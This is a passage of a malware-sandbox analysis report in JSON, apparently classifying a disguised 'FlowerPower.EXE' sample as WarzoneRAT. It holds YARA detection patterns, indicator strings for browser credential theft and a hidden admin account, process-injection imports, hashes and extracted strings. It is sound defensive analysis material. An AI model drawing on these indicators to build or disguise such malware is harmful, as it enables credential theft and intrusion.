54 FD FF FF 00 }", "{ C6 85 4A FD FF FF 72 C6 85 4B FD FF FF 74 C6 85 4C FD FF FF 75 C6 85 4D FD FF FF 61 C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }", "{ C6 85 4B FD FF FF 74 C6 85 4C FD FF FF 75 C6 85 4D FD FF FF 61 C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }", "{ C6 85 4C FD FF FF 75 C6 85 4D FD FF FF 61 C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }", "{ C6 85 4D FD FF FF 61 C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }", "{ C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }", "{ C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }", "{ C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }", "{ C6 85 6A FD FF FF 74 C6 85 6B FD FF FF 54 C6 85 6C FD FF FF 69 C6 85 6D FD FF FF 63 C6 85 6E FD FF FF 6B C6 85 6F FD FF FF 43 C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }", "{ C6 85 6B FD FF FF 54 C6 85 6C FD FF FF 69 C6 85 6D FD FF FF 63 C6 85 6E FD FF FF 6B C6 85 6F FD FF FF 43 C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }", "{ C6 85 6C FD FF FF 69 C6 85 6D FD FF FF 63 C6 85 6E FD FF FF 6B C6 85 6F FD FF FF 43 C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }", "{ C6 85 6D FD FF FF 63 C6 85 6E FD FF FF 6B C6 85 6F FD FF FF 43 C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }", "{ C6 85 6E FD FF FF 6B C6 85 6F FD FF FF 43 C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }", "{ C6 85 6F FD FF FF 43 C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }", "{ C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }", "{ C6 85 EF FA FF FF 63 C6 85 F0 FA FF FF 74 C6 85 F1 FA FF FF 69 C6 85 F2 FA FF FF 6F C6 85 F3 FA FF FF 6E C6 85 F4 FA FF FF 00 }", "{ C6 85 F0 FA FF FF 74 C6 85 F1 FA FF FF 69 C6 85 F2 FA FF FF 6F C6 85 F3 FA FF FF 6E C6 85 F4 FA FF FF 00 }", "{ C6 85 D4 FC FF FF 56 C6 85 D5 FC FF FF 69 C6 85 D6 FC FF FF 72 C6 85 D7 FC FF FF 74 C6 85 D8 FC FF FF 75 C6 85 D9 FC FF FF 61 C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 D5 FC FF FF 69 C6 85 D6 FC FF FF 72 C6 85 D7 FC FF FF 74 C6 85 D8 FC FF FF 75 C6 85 D9 FC FF FF 61 C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 D6 FC FF FF 72 C6 85 D7 FC FF FF 74 C6 85 D8 FC FF FF 75 C6 85 D9 FC FF FF 61 C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 D7 FC FF FF 74 C6 85 D8 FC FF FF 75 C6 85 D9 FC FF FF 61 C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 D8 FC FF FF 75 C6 85 D9 FC FF FF 61 C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 D9 FC FF FF 61 C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 6E FB FF FF 6D C6 85 6F FB FF FF 6F C6 85 70 FB FF FF 72 C6 85 71 FB FF FF 79 C6 85 72 FB FF FF 00 }", "{ C6 85 C6 FE FF FF 6E C6 85 C7 FE FF FF 5C C6 85 C8 FE FF FF 63 C6 85 C9 FE FF FF 6F C6 85 CA FE FF FF 6D C6 85 CB FE FF FF 6D C6 85 CC FE FF FF 61 C6 85 CD FE FF FF 6E C6 85 CE FE FF FF 64 C6 85 CF FE FF FF 00 }", "{ C6 85 C7 FE FF FF 5C C6 85 C8 FE FF FF 63 C6 85 C9 FE FF FF 6F C6 85 CA FE FF FF 6D C6 85 CB FE FF FF 6D C6 85 CC FE FF FF 61 C6 85 CD FE FF FF 6E C6 85 CE FE FF FF 64 C6 85 CF FE FF FF 00 }", "{ C6 85 C8 FE FF FF 63 C6 85 C9 FE FF FF 6F C6 85 CA FE FF FF 6D C6 85 CB FE FF FF 6D C6 85 CC FE FF FF 61 C6 85 CD FE FF FF 6E C6 85 CE FE FF FF 64 C6 85 CF FE FF FF 00 }", "{ C6 85 C9 FE FF FF 6F C6 85 CA FE FF FF 6D C6 85 CB FE FF FF 6D C6 85 CC FE FF FF 61 C6 85 CD FE FF FF 6E C6 85 CE FE FF FF 64 C6 85 CF FE FF FF 00 }", "{ C6 85 CA FE FF FF 6D C6 85 CB FE FF FF 6D C6 85 CC FE FF FF 61 C6 85 CD FE FF FF 6E C6 85 CE FE FF FF 64 C6 85 CF FE FF FF 00 }", "{ C6 85 CB FE FF FF 6D C6 85 CC FE FF FF 61 C6 85 CD FE FF FF 6E C6 85 CE FE FF FF 64 C6 85 CF FE FF FF 00 }", "{ C6 85 A3 F5 FF FF 6C C6 85 A4 F5 FF FF 6C C6 85 A5 F5 FF FF 22 C6 85 A6 F5 FF FF 29 C6 85 A7 F5 FF FF 2E C6 85 A8 F5 FF FF 52 C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }", "{ C6 85 A4 F5 FF FF 6C C6 85 A5 F5 FF FF 22 C6 85 A6 F5 FF FF 29 C6 85 A7 F5 FF FF 2E C6 85 A8 F5 FF FF 52 C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }", "{ C6 85 A5 F5 FF FF 22 C6 85 A6 F5 FF FF 29 C6 85 A7 F5 FF FF 2E C6 85 A8 F5 FF FF 52 C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }", "{ C6 85 A6 F5 FF FF 29 C6 85 A7 F5 FF FF 2E C6 85 A8 F5 FF FF 52 C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }", "{ C6 85 A7 F5 FF FF 2E C6 85 A8 F5 FF FF 52 C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }", "{ C6 85 A8 F5 FF FF 52 C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }", "{ C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }" ], "addresses": { "ss_small_bp": 37954, "ss_big_bp": 38590 } }, { "name": "INDICATOR_EXE_Packed_ASPack", "meta": { "description": "Detects executables packed with ASPack", "author": "ditekSHen" }, "strings": [ "{ 00 00 C0 2E 61 73 70 61 63 6B 00 00 }" ], "addresses": { "s1": 1569357 } } ], "cape_yara": [ { "name": "WarzoneRAT", "meta": { "author": "ditekshen", "description": "WarzoneRAT payload", "cape_type": "WarzoneRAT Payload" }, "strings": [ "PK11_CheckUserPassword", "PK11_Authenticate", "PK11SDR_Decrypt", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", "AVE_MARIA", "127.0.0.", "R\u0000D\u0000P\u0000C\u0000l\u0000i\u0000p\u0000", "G\u0000r\u0000a\u0000b\u0000b\u0000e\u0000r\u0000", "@\u0000\\\u0000c\u0000m\u0000d\u0000.\u0000e\u0000x\u0000e\u0000", "/\u0000n\u0000:\u0000%\u0000t\u0000e\u0000m\u0000p\u0000%\u0000\\\u0000e\u0000l\u0000l\u0000o\u0000c\u0000n\u0000a\u0000k\u0000.\u0000x\u0000m\u0000l\u0000", "H\u0000e\u0000y\u0000 \u0000I\u0000'\u0000m\u0000 \u0000A\u0000d\u0000m\u0000i\u0000n\u0000", "s\u0000o\u0000f\u0000t\u0000o\u0000k\u0000n\u00003\u0000.\u0000d\u0000l\u0000l\u0000", "n\u0000s\u0000s\u00003\u0000.\u0000d\u0000l\u0000l\u0000", "l\u0000o\u0000g\u0000i\u0000n\u0000s\u0000.\u0000j\u0000s\u0000o\u0000n\u0000" ], "addresses": { "s1_1": 2658195, "s1_2": 2658135, "s1_3": 2658155, "s1_4": 2660327, "s1_5": 2661811, "s1_6": 2656755, "s2_1": 2661715, "s2_2": 2662619, "s2_5": 2661765, "s2_6": 2671927, "s2_7": 2671975, "d1": 2658035, "d2": 2657847, "d3": 2658529 } } ], "clamav": [], "tlsh": "T1C2D59FD27F6A4467EE339BB3A20F716045847C7E5210FEEFAF252B4990931D18186E4E", "sha3_384": "195767451c3a4fcf1afc2b244d90d1b878fad680d199a79ce0c2081b37f60fc32adf357f1cd9f3816e474cad379d0649", "pe": { "guest_signers": { "aux_sha1": null, "aux_timestamp": null, "aux_valid": false, "aux_error": true, "aux_error_desc": "No signature found.", "aux_signers": [] }, "digital_signers": [], "imagebase": "0x00400000", "entrypoint": "0x0000b10f", "ep_bytes": "558bec6aff68c0c740006896b2400064", "peid_signatures": null, "reported_checksum": "0x00000000", "actual_checksum": "0x002ef857", "osversion": "4.0", "pdbpath": null, "imports": { "KERNEL32": { "dll": "KERNEL32.DLL", "imports": [ { "address": "0x40c048", "name": "GetStartupInfoA" }, { "address": "0x40c04c", "name": "GetModuleHandleA" }, { "address": "0x40c050", "name": "LoadLibraryA" }, { "address": "0x40c054", "name": "ExitProcess" }, { "address": "0x40c058", "name": "SetThreadContext" }, { "address": "0x40c05c", "name": "WriteProcessMemory" }, { "address": "0x40c060", "name": "VirtualAllocEx" }, { "address": "0x40c064", "name": "CreateProcessW" }, { "address": "0x40c068", "name": "GetProcAddress" }, { "address": "0x40c06c", "name": "GetModuleFileNameW" } ] }, "GDI32": { "dll": "GDI32.dll", "imports": [ { "address": "0x40c000", "name": "PolyPolygon" }, { "address": "0x40c004", "name": "Escape" }, { "address": "0x40c008", "name": "ExtTextOutA" }, { "address": "0x40c00c", "name": "TextOutA" }, { "address": "0x40c010", "name": "RectVisible" }, { "address": "0x40c014", "name": "PtVisible" }, { "address": "0x40c018", "name": "CreateCompatibleDC" }, { "address": "0x40c01c", "name": "LPtoDP" }, { "address": "0x40c020", "name": "CreateCompatibleBitmap" }, { "address": "0x40c024", "name": "GetMapMode" }, { "address": "0x40c028", "name": "Polygon" }, { "address": "0x40c02c", "name": "PtInRegion" }, { "address": "0x40c030", "name": "CreatePolygonRgn" }, { "address": "0x40c034", "name": "CombineRgn" }, { "address": "0x40c038", "name": "Polyline" }, { "address": "0x40c03c", "name": "BitBlt" }, { "address": "0x40c040", "name": "DPtoLP" } ] }, "MFC42": { "dll": "MFC42.DLL", "imports": [] }, "MSVCRT": { "dll": "MSVCRT.dll", "imports": [ { "address": "0x40c264", "name": "_except_handler3" }, { "address": "0x40c268", "name": "__set_app_type" }, { "address": "0x40c26c", "name": "_setmbcp" }, { "address": "0x40c270", "name": "__CxxFrameHandler" }, { "address": "0x40c274", "name": "_ftol" }, { "address": "0x40c278", "name": "wcslen" }, { "address": "0x40c27c", "name": "wcsstr" }, { "address": "0x40c280", "name": "strstr" }, { "address": "0x40c284", "name": "wcscat" }, { "address": "0x40c288", "name": "wcscpy" }, { "address": "0x40c28c", "name": "__dllonexit" }, { "address": "0x40c290", "name": "_onexit" }, { "address": "0x40c294", "name": "_exit" }, { "address": "0x40c298", "name": "_XcptFilter" }, { "address": "0x40c29c", "name": "exit" }, { "address": "0x40c2a0", "name": "_acmdln" }, { "address": "0x40c2a4", "name": "__getmainargs" }, { "address": "0x40c2a8", "name": "_initterm" }, { "address": "0x40c2ac", "name": "__setusermatherr" }, { "address": "0x40c2b0", "name": "_adjust_fdiv" }, { "address": "0x40c2b4", "name": "_controlfp" }, { "address": "0x40c2b8", "name": "__p__fmode" }, { "address": "0x40c2bc", "name": "__p__commode" } ] }, "USER32": { "dll": "USER32.dll", "imports": [ { "address": "0x40c2c4", "name": "EnableWindow" }, { "address": "0x40c2c8", "name": "GrayStringA" }, { "address": "0x40c2cc", "name": "DrawTextA" }, { "address": "0x40c2d0", "name": "TabbedTextOutA" }, { "address": "0x40c2d4", "name": "LoadCursorA" }, { "address": "0x40c2d8", "name": "SetCursor" }, { "address": "0x40c2dc", "name": "ClientToScreen" }, { "address": "0x40c2e0", "name": "IsIconic" }, { "address": "0x40c2e4", "name": "GetSystemMetrics" }, { "address": "0x40c2e8", "name": "GetClientRect" }, { "address": "0x40c2ec", "name": "DrawIcon" }, { "address": "0x40c2f0", "name": "SendMessageA" }, { "address": "0x40c2f4", "name": "LoadIconA" }, { "address": "0x40c2f8", "name": "ReleaseCapture" }, { "address": "0x40c2fc", "name": "GetWindowRect" }, { "address": "0x40c300", "name": "SetWindowRgn" }, { "address": "0x40c304", "name": "SetCapture" }, { "address": "0x40c308", "name": "CopyRect" } ] } }, "exported_dll_name": null, "exports": [], "dirents": [ { "name": "IMAGE_DIRECTORY_ENTRY_EXPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_IMPORT", "virtual_address": "0x0000cc50", "size": "0x00000078" }, { "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE", "virtual_address": "0x00041000", "size": "0x000006ec" }, { "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_SECURITY", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_DEBUG", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_TLS", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_IAT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_RESERVED", "virtual_address": "0x00000000", "size": "0x00000000" } ], "sections": [ { "name": ".text", "raw_address": "0x00001000", "virtual_address": "0x00001000", "virtual_size": "0x0000a692", "size_of_data": "0x0000b000", "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x60000020", "entropy": "6.07" }, { "name": ".rdata", "raw_address": "0x0000c000", "virtual_address": "0x0000c000", "virtual_size": "0x000013f2", "size_of_data": "0x00002000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x40000040", "entropy": "2.81" }, { "name": ".data", "raw_address": "0x0000e000", "virtual_address": "0x0000e000", "virtual_size": "0x00032fb4", "size_of_data": "0x00033000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "4.55" }, { "name": ".rsrc", "raw_address": "0x00041000", "virtual_address": "0x00041000", "virtual_size": "0x00001000", "size_of_data": "0x00001000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x40000040", "entropy": "1.62" } ], "overlay": { "offset": "0x00042000", "size": "0x0029e346" }, "resources": [ { "name": "RT_CURSOR", "offset": "0x000411a8", "size": "0x00000134", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "2.79" }, { "name": "RT_DIALOG", "offset": "0x000412dc", "size": "0x00000036", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "2.18" }, { "name": "RT_DIALOG", "offset": "0x00041314", "size": "0x00000042", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "2.38" }, { "name": "RT_STRING", "offset": "0x00041358", "size": "0x0000004a", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "1.99" }, { "name": "RT_GROUP_CURSOR", "offset": "0x000413a4", "size": "0x00000014", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "2.02" }, { "name": "RT_VERSION", "offset": "0x000413b8", "size": "0x00000334", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "3.32" } ], "versioninfo": [ { "name": "Comments", "value": "" }, { "name": "CompanyName", "value": "" }, { "name": "FileDescription", "value": "FlowerPower" }, { "name": "FileVersion", "value": "1, 0, 0, 1" }, { "name": "InternalName", "value": "FlowerPower" }, { "name": "LegalCopyright", "value": "Copyright (C) 2000" }, { "name": "LegalTrademarks", "value": "" }, { "name": "OriginalFilename", "value": "FlowerPower.EXE" }, { "name": "PrivateBuild", "value": "" }, { "name": "ProductName", "value": "FlowerPower" }, { "name": "ProductVersion", "value": "1, 0, 0, 1" }, { "name": "SpecialBuild", "value": "" }, { "name": "Translation", "value": "0x0c09 0x04b0" } ], "imphash": "676f4bc1db7fb9f072b157186a10179e", "timestamp": "2019-05-29 14:49:02", "icon": null, "icon_hash": null, "icon_fuzzy": null, "icon_dhash": null, "imported_dll_count": 5 }, "data": null, "strings": [ "x\\Y}e", "strstr", "[}ZgbT", "&2amz", "/YV[\\", "8Y4j^1X", "PolyLine8", "ct1)[", "tv5O9&A", "}DE21", "cw5|7", "sS\\jueyw", "f93tuS", "-YD<9", "JJJJJb", "_`8_`;^0", " ", "9 90969;9B9P9U9a9", "Ft2J/x", "StringFileInfo", "ab_Jl", "gYw~p", "\\w)g]$", "bnwkO", "!1(8<[", "JsQi\\", "LsMWtj", "NzjtVj", "WideCharToMultiByte", "27HII", "1FpGd", "C`qn]O", "bS(@To", "7H;EZ", "ds]RI", "Vcf8+o", "^HYr\\", "-D7XI_^", "\"':Lo", "!This program cannot be run in DOS mode.", "Grabber", "8%808E8M8]8", "\"?xk@", "hIoIJJJY", "q~U}!", "PI4F\\", "pX+SE", "wC{mq", ".NA$~", ")p\"3%", "BBIGNORE", "4#E}V", "89v6v", "s08\\^\"", "zAzJ{d{", "127.0.0.2", "krBX!7", "]3r'z", "7\\gn>", "\\qbVwc", "S[AQ-", ")D7XI_^", "unpack200.exe", "qiW{y", "oxuPab", "|KrLV", "B([W:", "ExpandEnvironmentStringsW", "5)2R2", "_5}_dc", "2z#IU", "CPP{J^", "u],S<", "JO)BM", "QWh@8B", "D 98J", "f]AF_", "8K^u3", "IIIIKJJJzJJJIIIILJJJw{JJ", "I_.$m", "Alb)J", ".adata", "gqJ$|", "Op>/=6*", "q;F]4tT", "6bC~u", "Q~xqNY", "Polygon26", "'.L* ", "OwJZJJ", "L:\\3[", "B2PCII", "iLN}Z{ab", "RegDeleteValueW", "eP% n", ";BQP8", "0+0D0]0v0", "=RyqD;", "pXcgf", "IKIIIMIXIHHII", "GRWTQ", "}5#ty", "iO8s*", "O/}JEA", "@Description", "1ry1U~", "LocalFree", "goeKA;", "PolyLine51", "Polygon45", "mYaqi", "EgJFY", "9E/+.", "uanVa_", ">2Q'II", "YI<,^", "253>3j3u3", "RnjhK", "KJJJ2qJJJ", " daQx", "\"7=57", "l?`qv", "iBVxq", "=$R,_zB", "/TsaW", "1HMYl", "kIRqk", " Yh[UH", "2!2A28;V;t;", "eX\"2b9", "xj{Xl{", "NN?I[i", ")yZ.i", ";ZAH<", "_,K:0-Q8]", "TabbedTextOutA", "d6,[=Y", "0^\\{{", "ncNFc", "mdh[-Z", "w\\ki;", "CreatePipe", "'?)DvS", "4?5Q5g5", "", "Hi3+w", "`cgRN", ".data", "start", "I{#ewD", "&2|M4iL^", "x(-_:", ":3<]<", "XPVSS", "ZTdVK", "q8\\/E", "cu;>*", "\"@}.c", "SHCreateDirectoryExW", "USER32.DLL", "JJJJt1", "iR[xXI", "OpenSCManagerW", "UvEZn|", "NF\"%b", "JJJ2MJJZqJJ", "m>,k5M", "Polygon2", "pA57b", "-MvzXUo", " Q:Pm", "w-~p:", "L-b.n", ";XV\\n", "a/2@K", ".-+1", "e(;;O", "]w1707", "J2EPJJ", "A-\\%T", "kS{ZN>J0", "Wi>#Q]t", "$$Yk/", "Ip|zW", "PWhP;B", "7A5U\"", "vSm] <", "qK\\-Eh", "^ozX|", "elj/a", " :H{H{P{Xia", "hoFII", "'T%nz", "HHH=jjjUnnnUmmmUmmmUmmmTmmmTmmmSmmmSnnnS|||R", "SetLastError", "4-yo'", "NW]kM", "-pD[}OIK", "aC\\&r", "Y9-le", "B22>II}", "JHe`B", "Wmo4.", "Process32FirstW", "dPa]r", "ccMIz", "YKyWs", "ExitProcess", "AZ[50", "Mmuas", "PolyPolygon76", "Ku6#h", "cv]%J", "7'<#O", "-w %ws -d C -f %s", "{fiQI", "tXTZo", "xkX+g", "J6IJJ", "J7IJJ", "Escape", "Polygon36", "wcslen", "IpIkI", "u4WWj", "u#P\\ct_-", "SVWj@R", ".(bicV", "6N7|\\", "_0^9vl", "-CukKY", "]zP/\"", "`~Svh", "l[ol&", "E3SFP", "VH4H[", "QS0'A", "$g\\%->s", "{^{yw", "HeapAlloc", "J2>?II", "PKHxE", "DVCLAL", "IIIIIRQIII", "5/7r7", "c!0W1", "\"]N?#!", "cCf#/d", "h:=(V", ">2'GM", "QRj|zf", "VIkYu", "#sGC'", "qFupm@]", "-BkPIih\"", "Zc{J]X", "J2IJJ", "STbM-", "3B? ]B]", "OdfT-", "$96lE1B", "I|ZuyXL", "POP3 User", "^uznI", "J2 @II", "!0V>S", "d*i~V", "u6AQVj", "Polygon68", "VUIdqp", "1S=z~", "\\explorer.exe", "ATPWS", "MZ$\"um", "~ =[h", "PclnJ", "%-eZ ", "zacI}", "b\"i:{a", "vt\\7tN", "e\\Jvp", "lSlwjb", "u$sIjA2", "RWh@RA", "/n:%temp%\\ellocnak.xml", "GetModuleHandleA", "N{[v}", "\\0CWZ", "msvcp120.dll", "0y=S\\(g.7", ",ihAr", "/2G|u", "236II", "msvcp140.dll", "JJIIIIKJJJ{JJJ", "0\\TlD", "5=\"0U0", "@(~7Y", "Polygon39", "zt!BSZ\\i%", "Vp9K?", "CreateProcessW", "Nn2zHIIM(", "+B\"S9x", "IrYNbkJ", "nZbz\"?", "~|nvl", "Ly6q4", "8R|\"]", "EA$X<", "W;K_Wv", "Q+'v S", "/EGQ++", "QWhPZA", "R_\\n~", "R^d6udM,", "TrBCi", "f=_x5|", "pP8`Wx", "Q.q?.", "PolyLine48", "7DYKy3", "Z(nTu", "\\9n5/ZJ", "a'Bfh", "kwtlq[", "I4AMR", "@\\cmd.exe", "D$@PQ", "fX:EN", "?'p89J:X", "sqlite3DEvent", "siM-H", "a^PlT", "JII1OIII", "323N3[3g3~3", "Y1M)GV", "IblVtFY}\"", "AzPZ%", "\\#,Ls", "`E22<", "7VJgo", "PvUMTYl|^", "NdU0}Xt", "4 4$4(4,4044484<4@4D4H4L4P4T4X4\\4`4d4h4l4p4t4x4|4", "&'()*+-J./", "w_\"g4", "}vLV[", "=^n~E", "00070D0K0/151<1C1J1U1d1s1", "sjoWuo", "Polygon72", "=$=B=`=", "PolyPolygon83", "(nv}Y", ";BCJSm", "3,*1y", "$^;tQy", "r>Gd:", "JOJJJ@KK", "Polygon28", "[`|ne", "Syt>_O", "6JJJJ", "JJIIIIMJJJ", "6JZJJY", "hgAEv", "S.Y9ZQ", "j}lN]l", "TuLxW", "JJJ25HII", "Yds1d", "\"MW=|", "@{uDv3", "$\"kr\\", "&*>RfP", "TqzuZ", "l92n#", "+:0{<[]", "AqIh'", "y*m$Cw", "J2OEII", "IIII)", "I\"Y*(", "rqe^!c", "Mp2z'", "HElXkm", "NVsteO", "mN21|", "wN83#Zh.<,", "],.'%", "B*@WB", "N{\"6#", "#9bc!", "[DK;J", "(q%e", ")K7D<", "|q/Cf2", "RZ/A$&F", "9%)ep", "3^p8l", "5]qa7", "WriteFile", "J2?6x#", "IIIIKIII", "tckKy^", "LookupAccountSidW", "eII", 